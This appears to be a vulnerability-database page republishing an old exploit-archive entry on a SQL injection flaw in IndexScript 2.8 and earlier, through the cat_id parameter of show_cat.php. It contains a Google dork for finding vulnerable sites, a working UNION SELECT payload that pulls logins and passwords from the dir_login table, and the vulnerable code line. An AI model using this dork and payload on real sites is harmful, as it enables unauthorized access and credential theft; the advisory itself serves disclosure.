Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:64820
HistoryJul 01, 2014 - 12:00 a.m.

IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability

2014-07-0100:00:00
Root
www.seebug.org
1485
JSON

No description provided by source.


                                                Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: &#34;This site is powered by IndexScript&#34;

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
&#34;$sql = &#34;select name, meta_title, meta_description, meta_keywords from dir_cat where &#34; .
 &#34;cat_id=&#34; . fnpreparesql($_GET[&#39;cat_id&#39;]);&#34;

# milw0rm.com [2007-07-25]
JSON